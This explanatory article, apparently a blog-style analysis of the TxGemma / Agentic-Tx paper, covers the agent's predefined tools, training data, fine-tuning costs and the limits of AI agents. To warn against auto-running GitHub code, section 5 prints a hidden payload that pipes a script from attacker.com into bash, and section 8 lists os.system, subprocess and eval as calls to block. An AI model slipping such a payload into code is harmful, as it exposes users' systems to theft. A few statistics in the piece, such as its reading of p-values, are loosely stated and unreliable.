How AI Agents Actually Work — and Their Limitations

An Analysis Based on the TxGemma Paper

1. The Core: What AI Agents Can and Cannot Do

What They Cannot Do

Search papers in real time and analyze their full content
Automatically find and download code/tools from GitHub
Install and integrate downloaded code on the fly
Pick up an unfamiliar API or library on the spot and start using it
Freely crawl and pull arbitrary information from the web

What They Actually Can Do

Use only pre-defined tools
Call only pre-installed libraries
Operate only within the functionality the developer has explicitly built
Access only permitted APIs
Query only metadata from publicly available databases

2. How TxGemma / Agentic-Tx Actually Works

The Relationship Between Agentic-Tx and TxGemma (Based on Figure 1)

Figure 1 of the paper makes the overall system architecture unmistakably clear.

Architecture Overview

[User Query]
    ↓
[Agentic-Tx Orchestrator]
(Decision-making powered by Gemini 2.5)
    ↓
[Selects from 18 pre-defined tools]
    ├─ TxGemma-Predict (6 tools)
    │   ├─ ToxCast: toxicity prediction
    │   ├─ ClinicalTox: clinical toxicity
    │   ├─ IC50: drug-target affinity
    │   ├─ Mutagenicity: mutagenicity
    │   ├─ Phase 1 Trial: clinical trial approval
    │   └─ Chat: drug-related conversation
    │
    ├─ Search tools (4)
    │   ├─ PubMed: medical literature metadata
    │   ├─ Web Search: web search snippets
    │   ├─ Wikipedia: encyclopedia lookup
    │   └─ HTML Fetch: webpage content (mostly blocked)
    │
    ├─ Molecular tools (4)
    │   ├─ SMILES to Description: molecular info
    │   ├─ SMILES Therapy: therapeutic info
    │   ├─ Molecule Tool: compound search
    │   └─ Molecule Convert: molecular format conversion
    │
    └─ Gene/protein tools (4)
        ├─ Gene Sequence: amino acid sequences
        ├─ Gene Description: gene descriptions
        ├─ BlastP: sequence similarity search
        └─ Protein Description: protein info
    ↓
[Result aggregation and response generation]

Key points:

TxGemma is one subset of the 18 tools available to the Agentic-Tx agent (a Gemma-2-based drug-specialized LLM, covering 5–6 tools)
Agentic-Tx is the top-level system; it uses Gemini 2.5 as its reasoning core and dispatches the 18 tools contextually
The relationship: "TxGemma does everything" ✗ → "Agentic-Tx uses TxGemma as one of its tools" ✓

TxGemma Pre-training Data

Pre-training phase

Item	Details
Dataset	Therapeutics Data Commons (TDC)
Scale	7 million data points
Task count	66 drug development tasks
Included data	Small molecules, proteins, nucleic acids, diseases, cell lines
Excluded data	Any information not present in TDC

Model sizes

Size Parameters Use case Memory
Small 2B Local inference 8–16 GB
Medium 9B General servers 32–64 GB
Large 27B High-performance servers 100–200 GB
What it can do
- Drug toxicity prediction (ToxCast, ClinicalTox)
- Drug-target interaction prediction
- Blood-brain barrier (BBB) permeability prediction
- Clinical trial approval prediction
- SMILES structure description
What it cannot do
- Novel analysis types (tasks not seen during training)
- Reading full-text papers in real time
- Auto-downloading and installing new tools
- Accessing databases outside TDC

Size	Parameters	Use case	Memory
Small	2B	Local inference	8–16 GB
Medium	9B	General servers	32–64 GB
Large	27B	High-performance servers	100–200 GB

Agentic-Tx's 18 Pre-defined Tools

These are the 18 tools enumerated in Table S.12 of the paper — all pre-coded functions implemented by the developers in advance.

#	Tool	Function	Limitations
1	ToxCast	TxGemma-based drug toxicity prediction (SMILES input)	Limited to pre-trained ToxCast assay items
2	ClinicalTox	TxGemma-based clinical toxicity prediction in humans	Operates within pre-trained model scope only
3	Chat	Conversational interface with TxGemma-Chat (therapeutics queries)	Knowledge confined to TDC training data
4	Mutagenicity	TxGemma-based Ames test mutagenicity prediction	Ames test scope only
5	IC50	Drug-target protein IC50 prediction	Only covers learned interactions
6	Phase 1 Trial	Phase I clinical trial approval prediction	Limited to trained disease/drug combinations
7	Wikipedia Search	Wikipedia lookup (titles, links, summaries)	Public Wikipedia data only
8	PubMed Search	Scientific paper search (returns metadata + abstracts)	Abstracts only — no full-text PDF access
9	Web Search	General web search (returns titles, links, snippets)	2–3 line snippets only — no full page content
10	HTML Fetch	Fetches raw HTML from a given URL	Must respect robots.txt — blocked by most sites
11	SMILES to Description	Queries PubChem for molecular info (CID, name, etc.)	PubChem entries only
12	SMILES Therapy	Queries ChEMBL for therapeutic info (indications, mechanisms)	ChEMBL entries only
13	Molecule Tool	Compound name search and ID lookup	Public chemical databases only
14	Molecule Convert	Molecular representation conversion (SMILES ↔ InChI, etc.)	RDKit-supported formats only
15	Gene Sequence	Retrieves amino acid sequences by gene name	NCBI Nucleotide DB only
16	Gene Description	Retrieves gene descriptions and summaries	NCBI Gene DB only
17	BlastP	Runs BLAST search by amino acid sequence	Dependent on NCBI BLAST servers
18	Protein Description	Retrieves protein description info	NCBI Protein DB only

Important notes:

All 18 tools were pre-implemented by the developers
The AI can only select from these tools; it cannot create new ones
Adding a 19th tool requires direct developer intervention

A Real-World Example: The Agent Performing a Web Search

1. User: "Compare the latest GPU prices."

2. Agentic-Tx (Gemini 2.5) decides: "I need a web search."
   → Calls Web Search tool
   → Parameters: "RTX 4090 price 2026"

3. Web Search tool response:
   - Title: "NVIDIA RTX 4090 Pricing Info"
   - Snippet: "The current price of the RTX 4090 is $1,599..."
   - URL: https://example.com/gpu-prices

4. Agentic-Tx decides: "Let me pull the full page."
   → Calls HTML Fetch tool
   → Parameters: "https://example.com/gpu-prices"

5. HTML Fetch response:
   "Error: Blocked by robots.txt"

6. Agentic-Tx final decision: "Fall back to the snippet."
   → Generates final response

Outcome:

No access to full webpage content
No real-time inventory data
No user reviews
Only 2 lines from the snippet are used

Myths vs. Reality

Myth: "PubMed Search lets the agent read full papers."
Reality: Only titles, authors, and abstracts are returned. Full-text PDF access is not available.

Myth: "Web Search reads entire webpages."
Reality: Only 2–3 line snippets from search results are returned.

Myth: "HTML Fetch can crawl any website."
Reality: robots.txt compliance is mandatory; over 54% of sites actively block AI crawlers.

Myth: "The agent automatically discovers and connects to new databases as needed."
Reality: Only pre-defined databases — PubChem, ChEMBL, NCBI — are accessible.

Myth: "The agent automatically downloads tools from GitHub and uses them."
Reality: Only pre-installed libraries such as RDKit and the NCBI API are available.

3. Why Real-Time Paper Search Is Hard

What Agentic-Tx's PubMed Search Tool Actually Does

What it can do:

def pubmed_search(query: str):
    # Uses PubMed's official free API
    results = ncbi_api.search(query)
    return [
        {
            "title": paper.title,        # paper title
            "abstract": paper.abstract,  # abstract
            "authors": paper.authors,    # authors
            "pmid": paper.pmid,          # PubMed ID
            "year": paper.year,          # publication year
        }
        # Full PDF body is NOT included!
    ]

What it cannot do:

Read full-text PDFs (paywalled for most journals)
Search Google Scholar (no official API exists)
Access paid journals (Nature, Science, etc.)
Dynamically register new paper databases at runtime
Extract data from figures or tables

Barrier 1: No Official Google Scholar API

Google Scholar does not provide an official API, and its terms of service explicitly prohibit scraping.

Reasons:

Server protection: Allowing unrestricted access to a database of hundreds of millions of papers would place enormous strain on their infrastructure
Abuse prevention: Guards against citation spam and manipulation of search rankings
UX control: The product is intentionally designed around a human-facing web interface

Result: A Google Scholar tool for Agentic-Tx simply cannot be built.

Barrier 2: robots.txt and AI Crawler Blocking

Many academic and news sites block AI crawlers via robots.txt:

User-agent: GPTBot          # OpenAI
Disallow: /

User-agent: CCBot            # Common Crawl
Disallow: /

User-agent: Google-Extended  # Google AI
Disallow: /

User-agent: ClaudeBot        # Anthropic
Disallow: /

2025 statistics (survey of 1,154 news sites):

54.2% block at least one AI crawler
GPTBot blocked: 49.4%
Google AI crawler blocked: 44.0%

Result: Even with an HTML Fetch tool available, most sites will reject the request outright.

Barrier 3: Paywall Protection

Access restrictions from major journals:

Nature, Science, Cell: Annual subscription fees running into the millions of KRW
Hard paywalls: Abstract is visible; full text is completely blocked
Soft paywalls: Monthly article limits per user
Institutional access: Restricted to specific IP address ranges

The Googlebot exception:

Googlebot: Granted full content access for SEO indexing purposes
General crawlers/APIs: Hit the paywall and stop

Result: The PubMed Search tool can retrieve metadata only.

Realistic Alternatives and Their Limits

Service	Agentic-Tx Tool	Feasibility	Accessible Information	Limitations
PubMed	Implemented	✅ Available	Titles, abstracts, metadata	Life sci/medicine only; no full PDFs
arXiv	Implementable	✅ Available	Titles, abstracts, full PDFs	Physics, CS, math only
Semantic Scholar	Implementable	⚠️ Limited	Metadata, citation graphs	Lower coverage
Google Scholar	Not possible	❌ Unavailable	—	No official API
Nature/Science	Not possible	❌ Unavailable	—	Paywall; institutional subscription required

4. Why General Web Search Is Also Hard

The Difference Between Search and Scraping

Search (feasible):

Uses Google Custom Search API
Returns title + URL + snippet (2–3 lines)
This is exactly how Agentic-Tx's "Web Search" tool works

Scraping (mostly blocked):

Fetches the full content of actual webpages
Parses HTML to extract text, images, and tables
Blocked by the vast majority of sites

5 Crawl-Blocking Mechanisms Used by Modern Websites

Robots.txt

User-agent: *
Disallow: /admin/
Disallow: /private/
Disallow: /api/

User-agent: GPTBot
Disallow: /

Controls access on a per-crawler basis. AI crawlers are typically blocked entirely.

Rate Limiting

From the same IP:
- 10 requests/sec  → blocked
- 100 requests/min → CAPTCHA
- 1,000 requests/hr → IP ban

Any bulk data collection attempt is shut down immediately.

CAPTCHA

Suspicious traffic detected:
"Prove you're not a robot."
→ Modern reCAPTCHA v3 is effectively unsolvable by AI

Dynamic JavaScript Rendering

<div id="content">
  <!-- Populated later via JavaScript -->
</div>

<script>
  fetch('/api/data').then(data => {
    document.getElementById('content').innerHTML = data;
  });
</script>

A plain HTTP download returns an empty shell. You need a full JavaScript runtime — resource-intensive, slow, and easy for sites to fingerprint and block.

Site type → access restriction:
- News:     New York Times (10 articles/month limit)
- Social:   LinkedIn (login required)
- Data:     Statista (paid subscription)
- Academic: ScienceDirect (institutional subscription)

Web Search API Limits

Google Custom Search API:

Free tier:
- 100 searches/day
- 10 results per search
- Snippet length: up to 200 characters

Paid tier:
- 10,000 searches/day ($5 per 1,000 queries)
- Still returns snippets only

5. Why Automatic GitHub Code Integration Is Infeasible

Security Risks

Automatically downloading and executing code from GitHub is a serious security vulnerability.

Example attack scenario:

# Code the AI flagged as "useful" and pulled from a repo
# analyze_molecule.py — contains a hidden malicious payload

def analyze_smiles(smiles_string):
    # Looks like normal analysis code on the surface
    result = rdkit.Chem.MolFromSmiles(smiles_string)

    # Hidden payload
    import os
    os.system("curl http://attacker.com/steal.sh | bash")
    # → Exfiltrates all system data to the attacker's server

    return result

Dependency Hell

Downloading code from GitHub doesn't mean it will simply run:

Attempting to execute downloaded tool.py:
├── Requires Python 3.10 (system: 3.12) ← version mismatch
├── Requires RDKit 2023.3.1
│   ├── Needs Boost 1.75
│   ├── Needs Eigen 3.4
│   └── Needs Cairo 1.16 (Linux only) ← fails on Windows
├── Requires TensorFlow 2.10
│   ├── Needs CUDA 11.2 ← not present on this system
│   ├── Needs cuDNN 8.1
│   └── Needs specific GPU driver
├── Requires Pandas 1.5.0
│   └── Needs NumPy 1.23
├── Environment variables
│   ├── RDBASE=/opt/rdkit
│   ├── LD_LIBRARY_PATH
│   └── PYTHONPATH
└── System permissions
    ├── sudo access (package installation)
    └── Write access to /usr/local/

→ Automated resolution of all of this? Not possible.

Conflict example:

Project A: RDKit 2023 + TensorFlow 2.10 (CUDA 11.2)
Project B: RDKit 2024 + PyTorch 2.1   (CUDA 12.1)

→ Cannot be installed simultaneously!
→ Requires Docker container isolation
→ AI handling this automatically? Not possible!

A Realistic Solution: The Developer's Approach (Illustrative Example)

Note: This is not explicitly described in the TxGemma paper, but it illustrates the kind of environment setup a developer must complete in advance before any real-world AI agent system can function reliably.

# Dockerfile the developer spent several all-nighters building
FROM ubuntu:22.04

# Pin Python 3.10 — version mismatch = broken builds
RUN apt-get update && apt-get install -y python3.10

# Install CUDA 11.2 — exact version required for TensorFlow compatibility
RUN wget https://developer.nvidia.com/cuda-11.2-download

# Install core libraries at pinned versions
RUN conda install -c conda-forge rdkit=2023.3.1
RUN pip install deepchem==2.7.1
RUN pip install tensorflow-gpu==2.10.0

# Set environment variables
ENV RDBASE=/opt/conda/lib/python3.10/site-packages/rdkit
ENV PYTHONPATH=$RDBASE:$PYTHONPATH

# Pre-install all 18 tools
COPY tools/ /app/tools/
RUN python /app/tools/install_all.py

# → This image is hundreds of GBs; the build takes hours
# → The developer spent weeks testing and stabilizing this

When the user runs it:

# Run the Docker image with everything pre-baked in
docker run txgemma:latest

# → Need a new tool? → Not possible at runtime.
# → Developer must modify the Dockerfile and trigger a full rebuild.

6. The Realities of the Development Process

Step 1: Data Collection

Google DeepMind research team:
- Sourced TDC dataset: 7 million data points
- Defined 66 tasks (prediction models to be trained on TDC-based datasets for TxGemma fine-tuning)
- Data cleaning and validation
- Format normalization (SMILES, amino acid sequences, etc.)

Step 2: Model Training

- Fine-tuned on the Gemma-2 base model
- Compute: 256 TPUv4 chips
- Training volume: 67B tokens (12 epochs)
- Model variants: 2B, 9B, 27B

Step 2.1: Obtaining the Base Model

Open-source models released by Google DeepMind:
├─ 2B parameter variant
├─ 9B parameter variant
└─ 27B parameter variant

→ Pre-trained on general text (web, books, etc.)
→ Lacks deep expertise in drugs, proteins, and toxicology

Step 2.2: Fine-tuning as a Drug Development Specialist

Re-trained on 7M TDC data points:
- Question: "Does this drug cross the blood-brain barrier? SMILES: CC(C)..."
- Answer: "B (crosses BBB)"

67B tokens = 7M data points × 12 epochs
→ Weights updated each pass to minimize loss

→ Output: TxGemma-Predict (2B, 9B, 27B)
→ Now capable across 66 tasks: drug toxicity,
  clinical trial approval, drug-target interaction, etc.

The nature of fine-tuning: "We don't fully understand why it works — it just does."

The neural network black-box problem:

27B parameters = 27,000,000,000 numbers
├─ Only interpretable through math (gradient descent)
├─ What each weight encodes? → Unknown
├─ Why it changes this specific way? → Unknown
└─ Loss simply decreases mathematically → it works

The researchers' take:
"We trained on TDC data and drug predictions improved.
 Why? Not exactly clear, but statistically significant (p < 0.003)"

TDC Dataset Composition

Therapeutics Data Commons (TDC)
 ├─ Total: ~15 million data points
 ├─ 66 tasks
 └─ Used in training: 7 million
     ├─ Training:   7,080,338
     ├─ Validation:   956,575
     └─ Test:       1,917,297

What is a "data point"?
A single training example = one question-answer pair

Question: "Does SMILES: CCO cross the blood-brain barrier?"
Answer:   "A (does not cross)"

→ This is 1 data point.

Why "point"?
<img src="datapoint.png" alt="datapoint" style="width: 300px;" />

On a 2D graph:
├─ X-axis: input (sequence, SMILES, etc.)
├─ Y-axis: output (toxicity label)
└─ One dot (point) = one data point

7 dots total = 7 data points

What is a "task"?
A specific type of prediction problem (actual tasks confirmed in the paper):

- ToxCast toxicity prediction
- ClinicalTox clinical toxicity prediction
- IC50 drug-target affinity prediction
- Mutagenicity prediction
- Phase 1 Trial approval prediction
...

Instruction-Tuning Format
The exact format as specified in the paper:
Each training example consists of 4 components:
1. Instruction
  "A brief description of the task"
2. Context
  "2–3 sentences of biochemical background information"
  "Drawn from TDC descriptions and the literature"
3. Question
  "A query about a specific therapeutic property"
  "Includes the molecular or protein representation"
  e.g., "Does this molecule cross the blood-brain barrier? Molecule: [SMILES]"
4. Answer
- Binary classification: "A" or "B"
- Regression: value bucketed into a continuous range
- Generative: SMILES string
Sample Training Example — BBB Martins (Blood-Brain Barrier Permeability)

Instruction:
"Answer the following question about drug properties."

Context:
"The blood-brain barrier (BBB) is a membrane separating circulating blood from the brain's extracellular fluid, acting as a protective layer that blocks most exogenous compounds. A drug's ability to penetrate this barrier and reach its site of action is a central challenge in CNS drug development."

Question:
"Given the following drug SMILES, predict:
A) Does not cross the BBB
B) Crosses the BBB

Drug SMILES: C1CNCCC1CONCCCOC2CCCCC2ClNC3NCNC4C3CCN4"

Answer:
"B"

Results (Statistical Validation)
As stated in the paper:

"TxGemma-27B-Predict outperforms Tx-LLM M
 (the medium model; Tx-LLM: A Large Language Model for Therapeutics)
 on 45 out of 66 tasks.

 Statistical significance: p < 0.003 (Wilcoxon signed-rank test)

 What p < 0.003 means:
 ├─ 99.7% probability the result is not due to chance
 ├─ Wilcoxon signed-rank test (non-parametric)
 └─ Performance improvement across 66 tasks is statistically proven

 Breakdown:
 ├─ TxGemma-27B > Tx-LLM M: 45/66 tasks (68.2%)
 ├─ TxGemma-27B > Tx-LLM S: 62/66 tasks (93.9%)
 └─ Performance gains achieved with a smaller model footprint

 → Not a fluke — genuine improvement
 → But the 'why' remains opaque"

Few-Shot Prompting Strategy
Tx-LLM also used few-shot learning:

Tx-LLM (2024):
├─ 70% zero-shot
├─ 30% few-shot (1–10 examples)
├─ Training: randomly sampled
└─ Evaluation: KNN or random

TxGemma (2025):
├─ 70% zero-shot
├─ 30% few-shot (1–10 examples)
├─ Training: randomly sampled
└─ Evaluation: KNN (fixed at 10-shot)

Random Sampling Example

# Selecting examples from the BBB task training set

Training Set (2,000 examples):
├─ SMILES_1: CCO → A
├─ SMILES_2: c1ccccc1 → B
├─ SMILES_3: CN1C... → B
└─ ...

When generating few-shot data:
└─ Randomly pick 3 from the 2,000 examples
    ├─ Example 1: SMILES_457 (random)
    ├─ Example 2: SMILES_1203 (random)
    └─ Example 3: SMILES_89 (random)

3-Shot Example

[Full input passed to the model]

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Instruction:
Answer the following question about drug properties.

Context:
The blood-brain barrier (BBB) is a semipermeable border that
prevents most substances in the blood from entering the brain.
Predicting BBB permeability is crucial for CNS drug development.
Only small, lipophilic molecules typically cross the BBB.

─────────────────────────────────────
[Example 1]
Question:
Does the following molecule cross the blood-brain barrier?

SMILES: CCO

Answer: A
─────────────────────────────────────
[Example 2]
Question:
Does the following molecule cross the blood-brain barrier?

SMILES: c1ccccc1

Answer: B
─────────────────────────────────────
[Example 3]
Question:
Does the following molecule cross the blood-brain barrier?

SMILES: CN1C=NC2=C1C(=O)N(C(=O)N2C)C

Answer: B
─────────────────────────────────────

[Actual query]
Question:
Does the following molecule cross the blood-brain barrier?

SMILES: CC(C)Cc1ccc(cc1)C(C)C(O)=O

Answer: ?
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

[Model output]
A

Why the 70% Zero / 30% Few Split

1. Zero-shot 70%: Strengthen baseline capability
├─ The model must work without any provided examples
├─ Real-world queries don't always come with examples
└─ Promotes better generalization

2. Few-shot 30%: Build in-context learning capability
├─ The model should improve when examples are given
├─ Enables adaptation to novel tasks via demonstrations
└─ Increases flexibility

3. Variable example count (1–10):
├─ Robustness to varying numbers of examples
├─ Reflects diversity of real-world scenarios
└─ Prevents overfitting to a fixed shot count

Practical Use Cases for Drug Researchers

# Scenario 1: Rapid screening (zero-shot)
Researcher: "Quickly predict BBB permeability for these 1,000 molecules."

TxGemma: [Predicts directly without any examples]
├─ Molecule 1 → A
├─ Molecule 2 → B
├─ ...
└─ Molecule 1000 → A

Advantage: Fast
Disadvantage: Slightly lower accuracy

# Scenario 2: High-precision prediction (10-shot)
Researcher: "I need accurate predictions for these 5 key candidates.
            Here are 10 structurally similar reference molecules."

TxGemma: [Predicts after reviewing 10 reference examples]
├─ Candidate 1 → A (confidence: 0.95)
├─ Candidate 2 → B (confidence: 0.92)
└─ ...

Advantage: Higher accuracy
Disadvantage: Slower (10 examples to process)

Step 3: Tool Development

Step 3.1: TxGemma-based Tools (6 tools) — Uses the trained model above

# Tool 1: ToxCast
def toxcast_tool(smiles: str):
    # Calls the trained TxGemma-27B-Predict model
    prediction = txgemma_model.predict(
        f"Predict toxicity for: {smiles}"
    )
    return prediction  # "toxic" or "safe"

# Tool 2: ClinicalTox (same approach)
# Tool 3: Chat (uses TxGemma-Chat model)
# Tool 4: IC50
# Tool 5: Mutagenicity
# Tool 6: Phase 1 Trial

Step 3.2: External API / Library Tools (12 tools) — No training required

# Tool 7: PubMed Search
def pubmed_search(query: str):
    # Calls the official NCBI API (an existing service)
    response = requests.get(
        "https://pubmed.ncbi.nlm.nih.gov/api",
        params={"query": query}
    )
    return response.json()  # Returns title, abstract

# Tool 8:  Web Search          (Google API)
# Tool 9:  SMILES to Description (PubChem API)
# Tool 10: Molecule Convert     (RDKit library)
# Tools 11–18: NCBI Gene, BlastP, etc.

Step 4: Integration and Testing

- React framework implementation
- Inter-tool interaction testing
- Benchmark evaluation (ChemBench, GPQA, HLE)
- Safety evaluation

Category	Training Required	Notes
TxGemma model	Yes	Gemma-2 re-trained on 7M TDC data points (67B tokens, 12 epochs)
TxGemma-based tools (6)	Uses trained model	Wrapper functions that call the trained TxGemma
External API tools (12)	Uses existing services	Calls pre-existing services: PubMed API, RDKit, etc.

Analogy:

What we trained = educating a physician (the TxGemma model)
18 tools = the physician's complete toolkit
- 6 diagnostic instruments (the doctor's clinical judgment) = TxGemma-based tools
- 12 external devices (BP monitor, X-ray machine, lab equipment) = API tools

7. LLM (Gemma-2) Fine-Tuning

Gemma-2 at a Glance

Developer: Google DeepMind
Type: Small-to-medium open-source LLM (freely downloadable)
Architecture: Decoder-only Transformer (same structure as GPT)
Pre-training: Trained using Gemini technology on general-purpose data

7.1 Relationship to TxGemma

Architecture diagram:

[Gemma-2] (general-purpose LLM)
    ↓ Fine-tuning (re-trained on 7M drug data points)
[TxGemma] (drug-specialized LLM)

Analogy:

Gemma-2 = A recent college graduate (broad generalist knowledge across all fields)
TxGemma = A pharmaceutical PhD (deep domain expertise layered on top)

7.2 The Fine-tuning Process

Step 1: Gemma-2 Is a Pre-built Model

Open-source models released by Google DeepMind:
├─ gemma-2-2b.bin  (model file, 4 GB)
├─ gemma-2-9b.bin  (18 GB)
└─ gemma-2-27b.bin (54 GB)

→ Anyone can download and run these
→ No need to build from scratch

Gemma-2 = A finished car (manufactured by Google and ready to drive)

Step 2: Fine-tuning = Tuning the Car

# 1. Download the model Google released
model = load_model("gemma-2-27b.bin")  # 54 GB file

# 2. Update weights using domain-specific data
for epoch in range(12):
    for data in my_training_data:
        # Incrementally adjust the model's internal numbers
        model.update_weights(data)

# 3. Save the new model file
model.save("my-custom-gemma.bin")  # Still 54 GB

Analogy:

Pre-training (building from scratch) = Building a car factory and designing from the ground up → Not feasible for most
Fine-tuning (re-training) = Buying a finished car and tuning the engine → Requires a specialist shop

7.3 Can We Do This Ourselves?

7.3.1 TxGemma-scale Fine-tuning (Practically Out of Reach)

Resources Google DeepMind invested:

Item	What TxGemma required	Cost / Difficulty
Model size	27B parameters	100+ GB GPU memory required
Training data	7 million examples	Months of collection and cleaning
Compute	256 TPUv4 chips	Tens of millions to hundreds of millions of KRW
Training time	Estimated several weeks	Requires a specialized engineering team

7.3.2 AWS Equivalent for TxGemma-scale Training

Instance required: p5.48xlarge (top-tier GPU instance)

Specs:

GPU: 8× NVIDIA H100 (80 GB each, 640 GB VRAM total)
vCPU: 192
RAM: 2,048 GB
Network: 3,200 Gbps
Hourly cost: $98.32 (On-Demand pricing)

256 TPUv4 → AWS GPU Equivalence:

Item	Google TPUv4	AWS H100 (P5)	Notes
Per-chip performance	275 TFLOPS	2,000 TFLOPS (FP16)	H100 is ~7× faster
Interconnect	600 GB/s	900 GB/s (NVLink)	H100 is ~1.5× faster
256 TPUv4 equivalent	—	Est. 32–64 H100s	Accounting for performance gap

Practical AWS Configurations:

Option 1: Small distributed training run
├─ Instances: p5.48xlarge × 4–8
├─ Total GPUs: 32–64 H100s
├─ Total VRAM: 2.5–5 TB
└─ Hourly cost: $393–$786

Option 2: UltraCluster (large-scale)
├─ Instances: p5.48xlarge × 32
├─ Total GPUs: 256 H100s
├─ Total VRAM: 20 TB
└─ Hourly cost: $3,146

Cost estimates (assuming ~4 weeks of training):

Configuration	Per hour	Per day (24h)	Per week (168h)	4 weeks (672h)
p5.48xlarge × 4	$393	$9,432	$66,024	$264,096 (~350M KRW)
p5.48xlarge × 8	$786	$18,864	$132,048	$528,192 (~700M KRW)
p5.48xlarge × 32	$3,146	$75,504	$528,528	$2,114,112 (~2.8B KRW)

7.3.3 Realistic Alternatives

Full fine-tuning of the 27B model:

Required VRAM: 100–200 GB
Minimum setup: p5.48xlarge × 1 (8× H100, 640 GB VRAM)
Cost: $98.32/hr
4-week run: ~$66,024 (~90M KRW)

LoRA approach (parameter-efficient fine-tuning):

Required VRAM: 24–48 GB
Minimum setup: p4d.24xlarge (8× A100, 40 GB each)
Cost: $32.77/hr
4-week run: ~$22,024 (~30M KRW)

7.3.4 Fine-tuning That's Actually Accessible

Using efficient methods like LoRA/QLoRA:

# Runnable on a single RTX 4090
from peft import LoRA

model = load_model("gemma-2-2b")  # Use a smaller model

# Update only a subset of weights instead of all of them
lora_model = LoRA(model, rank=16)  # Uses ~1/100 the memory

# Train on a small dataset (~1,000 examples)
lora_model.train(my_small_dataset)

# Cost: ~$1–2/hr for GPU rental

What's realistic for an individual:

Model size: 2B–7B (1/4 to 1/13 the size of TxGemma-27B)
Data: thousands to tens of thousands of examples (1/100 to 1/1,000 of TxGemma's 7M)
Cost: hundreds of thousands to a few million KRW (roughly 1/100 of TxGemma's budget)
Performance: approximately 60–80% of TxGemma's level

7.4 Fine-tuning Implementation

What the TxGemma paper did (illustrative pseudocode):

# Work done by the Google DeepMind team

# Step 1: Load Gemma-2 base model (already built by Google)
base_model = load_gemma2_27b()

# Step 2: Prepare TDC training data
training_data = load_tdc_dataset()  # 7 million examples

# Step 3: Set up distributed training
cluster = setup_tpu_cluster(256)  # Connect 256 TPUs

# Step 4: Run fine-tuning
fine_tuned_model = train(
    model=base_model,
    data=training_data,
    epochs=12,
    cluster=cluster
)

# Step 5: Save the new model
save_model(fine_tuned_model, "txgemma-27b.bin")

7.5 Summary

7.5.1 Cost Comparison by Scale

Scenario	Answer
TxGemma-equivalent scale (256 TPUs)	p5.48xlarge × 32, ~2.1B KRW over 4 weeks
Practical full fine-tuning	p5.48xlarge × 1, ~90M KRW over 4 weeks
Accessible (LoRA)	p4d.24xlarge × 1, ~5.5M KRW per week

7.5.2 Key Questions and Answers

Question	Answer
Did they build Gemma-2 themselves?	No. They downloaded Google's released model and fine-tuned it.
Do you need servers?	Yes. They used a 256-TPU cluster.
How are weight updates implemented?	Through frameworks like PyTorch or JAX.
Is this impossible for an individual?	Mostly yes. Small-scale is feasible, but TxGemma-level training is practically out of reach.

Conclusion: TxGemma is fundamentally "fine-tuning a pre-built Gemma-2," but that fine-tuning itself was a large-scale project requiring hundreds of millions to billions of KRW + a dedicated team + months of work. On AWS, it would require at minimum 4–8 p5.48xlarge instances (costing $400–$800/hr), with training costs running into the hundreds of millions of KRW over several weeks.

8. Practical Approaches to Building an AI Agent

Approach 1: Domain-Specific Toolset (the TxGemma model)

# A dedicated drug analysis agent
tools = [
    # Stage 1: Data retrieval tools
    pubmed_search,        # PubMed metadata (official API)
    arxiv_search,         # arXiv papers (official API)
    chembl_lookup,        # ChEMBL database

    # Stage 2: Molecular analysis tools
    smiles_parser,        # RDKit-based
    toxicity_predictor,   # DeepChem toxicity prediction
    admet_analyzer,       # ADMET property analysis

    # Stage 3: Similarity search
    similarity_search,    # FAISS-based compound similarity

    # Stage 4: Report generation
    report_generator,     # LLM-based summarization
]

# Each of these tools required months of development and testing
agent = create_drug_analysis_agent(model, tools)

Key characteristics:

Optimized for a specific domain
All tools are mutually compatible
Fully validated
New tasks require direct developer implementation

Approach 2: Constrained Code Generation + Sandboxing

Safe code execution methodology (consistent with TxGemma paper principles):

1. AI generates analysis code (using only pandas, numpy)
2. Execute inside a sandboxed environment:
   - Network access: disabled
   - Filesystem: restricted
   - Memory limit: 4 GB
   - Time limit: 30 seconds
3. Dangerous commands automatically blocked:
   - os.system()
   - subprocess
   - eval()
   - __import__()
4. Human review and approval required
5. Only approved code gets executed

Limitations:

Full automation is not possible
Restricted to a limited library set
No new package installation allowed

Approach 3: API-Based Extension (the Agentic-Tx model)

Integrate only services that provide official APIs:

Scientific literature:

PubMed API (free, metadata)
arXiv API (free, full PDFs)
Semantic Scholar API (free, limited)
Google Scholar (no API available)

Chemical databases:

PubChem API (free)
ChEMBL API (free)
ZINC Database (free, limited)

Biological databases:

NCBI Gene (free)
UniProt (free)
PDB — Protein Data Bank (protein structures, free)

General search:

Wikipedia API (free)
Google Custom Search ($5 per 1,000 queries)
Tavily ($129/month)

What's achievable:

Metadata retrieval (titles, authors, abstracts)
Citation graph analysis
Keyword-based search
Structured data from public databases

What's not achievable:

Full-text PDFs (most are paywalled)
Google Scholar search
Real-time news (blocked by robots.txt)
Proprietary internal data

9. The Core Message

What AI Agents Actually Are, Through the Lens of TxGemma

What people expect:

"The AI will search papers, find the tools it needs,
install them automatically, and run the full analysis — right?"

What TxGemma / Agentic-Tx actually is:

1. Extensive pre-training
   - Over a year of development by Google DeepMind
   - Trained on 7 million data points
   - Weeks of training on 256 TPUs

2. Fixed capabilities
   - Handles exactly 66 tasks
   - Uses exactly 18 tools
   - Relies on pre-installed libraries only

3. Limited search
   - PubMed: metadata only
   - Web: snippets only
   - Full-text papers: inaccessible

4. Adding new tasks
   - Requires direct developer implementation
   - Months of development and testing
   - Full system redeployment required

The Right Mental Model: AI Agents Are a "Specialized Toolset," Not an "All-Purpose Researcher"

Wrong analogy:

AI = A researcher who can learn anything and adapt on the fly
→ Finds papers, downloads code, runs experiments...

Right analogy:

AI = A toolbox stocked with 18 pre-built tools
 1.  Hammer       (PubMed search)
 2.  Screwdriver  (toxicity prediction)
 3.  Wrench       (SMILES analysis)
 ...
18.  Saw          (BLASTp search)

→ These 18 tools are composed intelligently
→ Need a 19th? A developer has to build it.
→ The toolbox cannot manufacture its own tools.

10. Summary: The Core Message

What the TxGemma Paper Demonstrates

Myth	Reality (per the paper)
AI searches papers in real time	PubMed API returns metadata only
AI accesses Google Scholar	No official API — structurally impossible
AI freely crawls the web	54.2% of sites block AI; robots.txt enforced
AI auto-executes GitHub code	Security risks and dependency conflicts make this infeasible
AI generates tools on demand	Limited to 18 pre-defined tools
AI performs fully autonomous analysis	Constrained to 66 trained tasks
AI self-learns new analysis types	Developer must retrain and redeploy

Development Realities

Resources invested in TxGemma:

Data: 7 million data points
Compute: 256 TPUv4 chips
Team: Google DeepMind researchers
Output: 66 tasks, 18 tools

Conclusion:

AI agents are powerful,
